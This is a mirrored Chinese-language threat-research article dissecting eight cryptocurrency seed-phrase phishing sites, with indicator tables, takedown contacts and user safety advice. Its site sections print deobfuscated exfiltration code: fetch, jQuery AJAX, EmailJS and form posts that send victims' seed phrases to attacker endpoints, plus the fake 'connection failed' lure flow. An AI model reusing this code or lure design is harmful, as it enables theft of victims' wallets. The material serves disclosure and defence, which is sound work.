Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / ZH / PHISHING ANATOMY

8款密钥短语窃取工具被逆向工程

The Enablers Registry·Editorial mirror·/zh/phishing-anatomy

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

加密货币网络钓鱼的剖析:
8起真实攻击事件剖析

我们拦截了实时钓鱼流量,对5款助记词窃取工具进行了逆向工程分析,并将被盗数据追踪至[REDACTED]机器人、EmailJS账户以及“钓鱼即服务”(Possibly phishing-as-a-Service)后端。

2026年3月27日 THE ENABLERS REGISTRY 研究 阅读时间 18 分钟
加密货币网络钓鱼调查剖析
对截获的网络钓鱼流量进行的实时分析揭示了完整的攻击基础设施
8分析的网站
7数据外泄方法
1,824+被盗凭证
380+钱包品牌
$0攻击者成本

我们的发现

每天,都有成千上万的加密货币用户因误入与正规钱包服务毫无二致的钓鱼网站而损失资金。但接下来会发生什么呢 后面 那个虚假的“Connect Wallet”按钮?你的助记词到底被存到了哪里?

我们拦截了来自 5 个活跃钓鱼网站的实时 HTTP 流量,下载了它们的完整源代码,并追踪了每个数据外泄端点的最终目的地。此次调查揭示了现代加密货币钓鱼攻击的完整运作机制——从诱使你输入助记词的社会工程学伎俩,到将助记词实时发送给攻击者的 [REDACTED] 机器人。

免责声明

本文中显示的所有助记词均为随机生成的测试数据。在本次调查过程中,未泄露任何真实的凭据。所有相关网站均已向其各自的托管服务商和滥用处理部门进行了举报。

通用攻击模式

尽管品牌和后端各不相同,但这8个钓鱼网站都遵循了 完全相同的心理漏斗:

登陆页面建立信任
钱包选择器60–110+ 个徽标
虚假的“正在连接...”3–5 秒计时器
“连接失败”总是失败
手动输入种子 / 密钥 / 密钥库
数据外泄TG / 电子邮件 / API

关键洞察:“正在连接...”动画总是 注定会失败. 在第4个网站的源代码中,我们发现 const success = false — 没有尝试连接钱包。整个流程的存在,纯粹是为了引导受害者进入“手动连接”表单。

六步加密钓鱼攻击链
我们分析的所有钓鱼网站都采用的通用6步攻击链

8个站点:详细分析

1
网络层协议
[REDACTED]
直播IANA #1910 Pages[REDACTED] 机器人 + EmailJS

冒充

一个用于钱包验证的虚构“去中心化协议”。该协议采用CryptoCompare的实时价格行情显示,并链接至真实的区块链浏览器(以太坊、BSC、Polygon、Avalanche、Solana、Cardano),以增强可信度。 该登录页面展示了100多个钱包徽标,并设有3步“验证”流程。

双重外泄链

这5个系统中后端架构最为复杂——每一条被盗的凭据都会通过 两个独立通道 同时:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on [REDACTED]
  |      |
  |      +--> [REDACTED] Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

OSINT调查结果

指标
诈骗邮件Bestgrace309@gmail.com
[REDACTED] 机器人@DewdropsTG_bot(ID:7567323692)
[REDACTED] 收件人@metatech2(聊天ID:7350941887)
后端[REDACTED]
EmailJS 服务service_d5qigxs / template_7bqxeaa
隐藏领域layerschain.in(源自 CF 电子邮件混淆处理)
已发送的消息1,824+(来自 [REDACTED] 的 message_id)
域名年龄2天(TLS:2026年3月25日)
作战安全(OPSEC)失误

攻击者的电子邮件是在一个 JavaScript 注释 内部 config.js: // Bestgrace309@gmail.com。他们在部署前忘记将其移除了。此外,[REDACTED] 中继后端完全开放——既无身份验证,也无速率限制。通过解码 IANA #1910data-cfemail 在 HTML 中经过混淆处理后,我们还发现了一封隐藏的电子邮件: support@layerschain.in,连接至印度和南非的托管基础设施。

2
AQLA 代币迁移
[REDACTED]
直播IANA #1910 Pages非静态表单

冒充

对现实的像素级精准还原 Aqualibre (AQLA) 令牌迁移页面。该 HTML 包含一个元数据标签,其中披露了来源: data-scrapbook-source="https://token.[REDACTED]/migration",时间戳为2024年11月19日。

零代码方法

该攻击者需要 零服务器端代码. 该 表单直接提交至 非静态 — 这是静态网站的一种合法表单后端。每条 提交的信息都会被转发到诈骗者的邮箱。攻击者的 邮箱是 在源代码中永远不会显示.

<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
价格:0美元

IANA #1910 Pages:免费。Un-static Forms:免费。未购买 域名。未租用服务器。基础设施总成本: 零美元.

3
[REDACTED] 拼写错误抢注
[REDACTED]
直播 IANA #1910 Pages 非静态表单

冒充

该子域名包含“safpal" — 这是 对 [REDACTED],一款 广受欢迎的硬件钱包。该网站伪装成“区块链钱包 问题反馈”平台,设有26个虚假问题分类。利用Typed.js实现 区块链名称(以太坊、BSC、Polygon……)的动态展示,并使用 LiveCoinWatch行情滚动条来增强可信度。

相同的装备,相同的操作员?

使用 完全相同的网络钓鱼模板 作为第2号站点: 完全相同 connect.html, 完全相同 wallets.html 包含 60 多个徽标,使用相同的 Un-static 后端(表单 ID 不同—— 6f1b82c3...da9943af). 该套件完全相同,这强烈表明 由一名操作员同时负责这两个站点.

代码中的错误提示:“Privay Policy”(缺失一个“c”)、“seperated”(应为“separated”)、“Kestore”(缺失一个“y”)。密码字段使用 type="text" 而不是 type="password".

4
Flare Network 克隆版
[REDACTED]
直播IANA #1910 Pages双重 EmailJS(冗余)

冒充

几乎是该产品的完美复刻版 Flare Network portal —— 一个真正的第1层EVM区块链,支持FTSO和Data Connector协议。复制了30多家生态系统合作伙伴、导航功能和品牌形象。网站图标从一个域名抢注网站加载而来: [REDACTED] (“mainnet”中少了一个“n”)。

EmailJS 双重冗余

唯一使用 同时使用两个独立的 EmailJS 账户 用于防止关停冗余:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

每起盗窃案的电子邮件主题: "New Wallet Details from Flare".

这是一家已获得融资的企业

该 HTML 包含 Google 标签管理器 (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Lunio PPC 保护功能,以及一个 Twitter/X 广告像素. 攻击者正在运行 付费广告 旨在将受害者引导至钓鱼网站,并过滤掉机器人点击。这绝非业余爱好——而是一项由资金支持的运作,配备了数据分析工具并投入了广告费用。

Flare Network 钓鱼网站同时使用 EmailJS 和付费广告
第4个网站:付费广告、分析追踪和双重数据外泄——最专业的行动
5
COIN NODE / 钱包修复(PhaaS)
[REDACTED]
后端已死PulseResolve API(PhaaS)

冒充

一款通用的“COIN NODE”/“Wallet Fix”服务(无具体品牌)。版权所有“Wallet Fix 2022”——该套件模板至少已有4年历史。图片托管于 [REDACTED] (AWS 上的 WordPress)。

钓鱼即服务

最令人担忧的后端架构:一个 基于 UUID 的多租户 API:

POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+...

每个诈骗者都会获得一个专属的 UUID 端点。一名中央操作员负责维护该 API、追踪诈骗活动,并可能从被盗资金中抽取分成。这就是 工业化规模的加密货币盗窃 — 一种“钓鱼即服务”(Possibly phishing-as-a-Service)模式。

相关基础设施(基本已废弃)

域名角色状态
[REDACTED]数据外泄 APINXDOMAIN
[REDACTED]网站图标托管NXDOMAIN
[REDACTED]Logo 主持人NXDOMAIN
[REDACTED]图片 CDN已上线(AWS)
僵尸前端

后端已经崩溃了,但 前端仍处于运行状态IANA #1910 Pages 上。如果攻击者重新注册 [REDACTED], 网站随即恢复运行。

6
支持中心 + 账本恢复
[REDACTED] & [REDACTED]-recovery.support
直播IANA #1910 Pages + Replit自定义 C2 APIBIP39 自动补全

冒充

A 双管齐下的行动:位于 [REDACTED] 包含15个虚假发行类别和39个钱包品牌,此外还有 像素级还原的 [REDACTED] 入门指南克隆版[REDACTED]-recovery.support 托管在 Replit 上——包含设备型号选择、PIN 设置以及一个包含 24 个单词的助记词网格,其中 真正的 BIP39 自动补全.

反扫描器 C2 后端

该钱包支持页面会将被盗数据发送至 [REDACTED]/log — 一个部署在 IANA #1910 后端的自定义 nginx/Ubuntu C2 服务器。后端 有意丢弃所有 GET 请求 (返回 522 超时错误),仅响应 POST 请求。这意味着 URL 扫描器、Google Safe Browsing 爬虫以及使用 GET 请求向该端点发送探测的安全研究人员都无法获取任何信息——该 C2 似乎已失效。

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.[REDACTED]",
  allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
    "[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

[REDACTED] 克隆项目在 Replit 平台上运行着一个独立的 Express.js 后端: POST /api/recovery-phrase 收集 {deviceId, pin, phrase}. 它返回 400 {"error":"Invalid data provided"} 对于格式错误的输入——确认后端是否 已上线并正在积极验证中 被盗数据。

OSINT调查结果

指标
前端(钱包)[REDACTED]
前端([REDACTED][REDACTED]-recovery.support (34.111.179.208)
C2 后端 [REDACTED] → nginx/1.24.0 Ubuntu
C2 IP地址104.21.60.163 / 172.67.198.35(IANA #1910
Replit 验证a43d3852-5304-47af-a61b-f0f6f3912736
注册处[REDACTED] ([REDACTED]-recovery.support)
已部署2026年1月9日(Last-Modified标头)
技术栈 React + Vite + Tailwind v4.1 + Framer Motion
最高用户体验保真度

这个 466 KB 的 JS 打包文件包含 完整的 BIP39 词表 在实时自动完成功能中,“密码短语”一词出现67次,“助记词”出现39次。这款[REDACTED]克隆设备引导受害者完成的入门流程与真正的[REDACTED]设备完全一致——这是整个调查中最具说服力的钓鱼页面。该 apiKey 配置中的该字段建议 多租户 PhaaS 架构.

7
去中心化发售平台
[REDACTED]
直播IANA #1910 PagesFormSubmit.co

冒充

一个通用的“去中心化发售平台”,具有 21种饵料类别 (质押、迁移、KYC、赠品活动、领取奖励、资产恢复、预售、铸造NFT、被锁定的账户……)以及 70多个钱包品牌 ——这是我们见过的最全面的钱包列表之一。那个显而易见的拼写错误“Sychronize”(少了一个“n”),暴露了这是假的。

FormSubmit Pipeline

用途 FormSubmit.co — 一项正规的表单转邮件服务。端点哈希 a2cf4131f1a5d39453c7c183df96f86f 这是诈骗者电子邮件地址的MD5值。我们对Gmail、Yahoo、Hotmail、ProtonMail、Yandex和[REDACTED]上的数百种电子邮件地址模式进行了暴力破解—— 未找到匹配项. 诈骗者使用的是一个不常见的或随机生成的电子邮件地址。

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

OSINT调查结果

指标
域名[REDACTED]
表单提交哈希值a2cf4131f1a5d39453c7c183df96f86f
活动 IDDAPP 去中心化
FontAwesome 工具包bdc3291137(套件编号 #112310842,免费版 v6.7.2)
jQuery3.2.1 与 3.5.1 同时加载
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1(版本不匹配)
两个牵引把手

FontAwesome 工具包 bdc3291137 — FontAwesome 可以识别出该套件 ID 背后的账户所有者。活动标签 DAPP DECENTRALIZED 可能会出现在使用相同 FormSubmit 哈希值的其他钓鱼网站上。在窃取助记词后,一个 虚假二维码和随机生成的7位参考码 显示的内容是:“请向管理员提供您的唯一参考代码”——这只是让受害者继续等待,而非展开调查。

8
家用电脑上的 R2 Bucket + PHP
pub-519769e9eb634616b1746c2018641d56.r2.dev
已死IANA #1910 R2PHP + DDNS

冒充

未知——前端和后端均已离线。根据有效载荷结构判断,这是一款加密钱包助记词窃取器。该 IANA #1910 R2 公共存储桶 (对象存储,而非 Pages)是一种 有充分记录的网络钓鱼攻击途径 据Netskope报告,已识别出5,000多个恶意网页,流量增长了61倍。

“脚本小子”的配置

基本操作 在此集合中。助记词会被发送 逐字 指向运行在家庭电脑或VPS上的PHP脚本,该脚本通过免费的动态DNS进行访问:

POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

OSINT调查结果

指标
前端 pub-519769e9eb634616b1746c2018641d56.r2.dev [离线]
后端 [REDACTED] [NXDOMAIN]
R2 桶 ID519769e9eb634616b1746c2018641d56
DDNS 服务商 [REDACTED] / [REDACTED](俄亥俄州辛辛那提市)
DNS NSns10–[REDACTED]
用户名mercifuljigga4real123(简体中文(大陆))
OSINT 用户名:mercifuljigga4real123

“Merciful” + “jigga”(Jay-Z的昵称) + “4real” + “123”——一个极具个人特色的昵称,暗示着对嘻哈文化的热爱。 未找到 在任何被收录的平台:GitHub、X、Instagram、TikTok、Reddit、YouTube、Twitch 或 [REDACTED]。很可能以该名称或类似名称活跃于 [REDACTED][REDACTED] 或游戏平台。文件名 fuc.php 与把手那不拘一格的风格相得益彰。

窃取你的助记词的7种方法

四种加密货币钓鱼数据窃取方法对比
8个钓鱼网站中使用的7种不同的数据外泄架构
方法网站工作原理速度成本
[REDACTED] 机器人#1 [REDACTED] 上的 Express.js 会将请求转发至 Bot API。诈骗者会立即收到包含凭据的私信。 实时$0
EmailJS#1, #4 客户端 JavaScript 会直接将数据发送至 EmailJS API,该 API 随后将数据转发至诈骗者的邮箱。 约1分钟$0
非静态表单#2, #3 向一个合法的表单服务发送标准的 HTML 表单 POST 请求,该服务会通过电子邮件转发提交的内容。 约1分钟$0
FormSubmit.co#7 通过 jQuery AJAX 发送至 FormSubmit.co。电子邮件地址被 MD5 哈希值隐藏。该活动标记为“DAPP DECENTRALIZED”。 约1分钟$0
自定义 C2 API#6 React 单页应用(SPA)将请求发送至位于 IANA #1910 后端的 nginx/Express API。 丢弃 GET 请求 (522) 以躲避扫描器。仅响应 POST 请求。 实时约$5/月
PHP + DDNS#8 通过免费动态DNS([REDACTED])在家庭电脑上运行的PHP脚本。助记词按单词逐一发送。 实时$0
PhaaS API#5 基于 UUID 的多租户 API。中央运营商管理后端,诈骗者租用端点。 实时未知

揭露所有网络钓鱼网站的7个警示信号

如果你看到 任何 如果遇到以下情况,请立即关闭该标签页:

1. “连接失败”总是假的

真正的钱包连接会使用 WalletConnect 协议或浏览器扩展程序。它们绝不会显示要求您输入助记词的“连接失败”错误提示。

2. 50–110+ 个钱包徽标,一站式获取

每个钱包图标都会跳转到同一个表单。真正的服务应该集成每个钱包的实际SDK。

3. 提交后出现“错误”

提交后出现的虚假“503 错误”或“未知错误”是蓄意为之。你的数据早已被盗——该错误旨在诱骗你使用另一个钱包再次尝试。

4. 托管于 .pages.dev

这5个网站均滥用了IANA #1910 Pages的免费套餐。无需身份验证。2025年,IANA #1910 Pages上的网络钓鱼滥用行为增加了198%。

5. 三个选项卡:短语 / 私钥 / 密钥库

没有任何合法服务需要这三种凭证类型。这种三栏表单是钓鱼工具包的典型特征。

6. 不与区块链交互

这些网站都无法加载 ethers.js, web3.js,也不会发起任何 RPC 调用。它们只是伪装成去中心化应用(dApp)的纯 HTML 表单。

7. 零成本基础设施

免费托管 + 免费表单服务 + 免费消息发送 = 零成本的完整网络钓鱼操作。如果网站没有真正的域名,就要提高警惕。

完整的IOC表格

致安全团队、威胁情报平台及滥用行为举报人:

域名与基础设施

域名类型状态
[REDACTED]网络钓鱼前端直播
[REDACTED]网络钓鱼前端直播
[REDACTED]网络钓鱼前端直播
[REDACTED]网络钓鱼前端直播
[REDACTED]网络钓鱼前端直播
[REDACTED]TG 继电器后端直播
[REDACTED]错拼域名资产未知
layerschain.in相关领域DNS 故障
[REDACTED]PhaaS 后端NXDOMAIN
[REDACTED]资产托管方NXDOMAIN
[REDACTED]Logo 主持人NXDOMAIN
[REDACTED]图片 CDN已上线(AWS)
[REDACTED]网络钓鱼前端直播
[REDACTED]-recovery.support[REDACTED] 钓鱼攻击(Replit)直播
[REDACTED]C2 后端(nginx/Ubuntu)直播
[REDACTED]根域404
[REDACTED]网络钓鱼前端直播
pub-519769e9eb634616b1746c2018641d56.r2.dev网络钓鱼(R2 存储桶)离线
[REDACTED]PHP 后端(DDNS)NXDOMAIN

账户与标识符

类型网站
电子邮件Bestgrace309@gmail.com#1
电子邮件(隐藏)support@layerschain.in#1
[REDACTED] 机器人@DewdropsTG_bot (7567323692)#1
[REDACTED] 用户@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
非静态表单c78173e2d991...94c3f76#2
非静态表单6f1b82c3ce55...da9943af#3
PhaaS UUIDa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
渲染实例rndr-id:ed83576e-b1b3-4c82#1
Replit 验证a43d3852-5304-47af-a61b-f0f6f3912736#6
表单提交 MD5a2cf4131f1a5d39453c7c183df96f86f#7
活动标签DAPP 去中心化#7
FontAwesome 工具包bdc3291137(套件编号 #112310842)#7
R2 桶 ID519769e9eb634616b1746c2018641d56#8
用户名/DDNSmercifuljigga4real123(简体中文(大陆))#8

在哪里举报加密货币钓鱼诈骗

如何举报加密货币钓鱼网站——多渠道关停行动
同时针对托管服务、后端服务和消息传递平台,以实现最快的关停速度
服务应报告的内容如何
IANA #19107个 .pages.dev 存储桶 + 1个 R2 存储桶abuse.IANA #1910.com
Google Safe Browsing所有钓鱼网址举报网络钓鱼
PhishTank社区黑名单的所有网址[REDACTED]
EmailJS3个被滥用的账户(服务ID见上文)abuse@emailjs.com
非静态2 个表单端点通过 [REDACTED] 联系
[REDACTED][REDACTED] 中继后端渲染滥用表单
[REDACTED]@DewdropsTG_bot + @metatech2[REDACTED].org/support
谷歌(Gmail)Bestgrace309@gmail.comGoogle 滥用行为举报
Twitter/X推广网站#4的广告账户X 广告滥用举报
FormSubmit.co哈希值 a2cf4131... (#7)FormSubmit 滥用表单
Replit[REDACTED]-recovery.support (#6)Replit 滥用报告
[REDACTED][REDACTED]-recovery.support 的注册商[REDACTED] 滥用
DNSExit[REDACTED][REDACTED] 滥用
FontAwesome套件 bdc3291137(#7)FontAwesome 的滥用
Chainabuse所有网络钓鱼活动[REDACTED]

如何保护自己

黄金法则

任何正规的服务都不会要求您在网站上输入助记词。 助记词仅应在钱包恢复过程中输入到官方钱包软件中——切勿在第三方“验证”、“同步”或“恢复”网站上输入。

在连接任何钱包之前:

  • 请确认网址与官方域名一致。请检查 SSL 证书的详细信息。
  • 真正的 WalletConnect 采用二维码或深度链接——绝不会以助记词的形式出现。
  • 如果出现“连接失败”并要求您手动输入凭据——这就是网络钓鱼。
  • 在以下位置检查可疑网址: PhishTankVirusTotal 在进行交互之前。
  • 使用硬件钱包——它要求对每笔交易进行物理确认。
  • 将官方网址添加到书签。切勿点击广告、私信或社交媒体中的链接。

加密货币网络钓鱼分类法

种子短语窃取者只是其中一类。以下是加密货币网络钓鱼的完整全景图——我们将针对每种类型进行深入剖析。

助记词窃取者
虚假的“Connect Wallet”页面会诱骗您输入恢复短语。本文重点——深入剖析5个真实案例。
上文已提及
审批劫持
一些恶意去中心化应用(dApp)会通过[REDACTED]要求用户授予无限的代币授权。一旦授权通过,攻击者无需获取您的助记词,即可将您的钱包清空。
即将推出
冰钓(Permit2)
利用了 EIP-2612 的“无 gas 许可”机制。受害者签署了一条链下消息,授予了代币转移权限——直到资金被转移前,链上均未显示任何批准记录。
即将推出
虚假空投宣传
虚假代币空投,要求用户通过恶意智能合约进行“领取”。实际上,领取交易会将你的真实代币转走。
即将推出
剪贴板劫持程序
一种恶意软件,它会监视您的剪贴板,并在您粘贴之前悄无声息地将复制的钱包地址替换为攻击者的地址。
即将推出
撒粉 + 中毒
来自相似地址的微小交易会污染您的交易记录。受害者会从交易记录中复制该虚假地址,用于下一次转账。
即将推出

令人不适的真相

开展一次加密货币网络钓鱼行动的成本 $0 并采取 30分钟以内. 免费托管、免费表单服务、免费消息机器人。网站#1背后的攻击者已经从 1,824+名受害者. 第4号站点正在运行 付费广告 扩大规模。这可不是业余玩意儿——这是一个产业。唯一的防御就是提高警惕。

帮助我们反击

THE ENABLERS REGISTRY 实时追踪并报告加密货币钓鱼网站。如果您遇到可疑网站,请向我们举报——我们将进行调查并努力将其关闭。

相关调查

调查
[REDACTED] 的终结:IANA #1479 为庇护一名 M 级窃贼而撒谎
持续10年的门罗币盗窃案。3家域名注册商涉案。IANA #1479编造了7项谎言。
深度解析
加密货币盗币网络:基础设施曝光
“排水即服务”业务如何共享基础设施和操作人员。
面板外露
[REDACTED] 钓鱼面板:完全管理员权限
我们成功访问了[REDACTED]钓鱼攻击活动的管理后台。
基础设施
诈骗基础设施曝光:共享后端
诈骗团伙如何共享服务器、模板和支付流程。

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings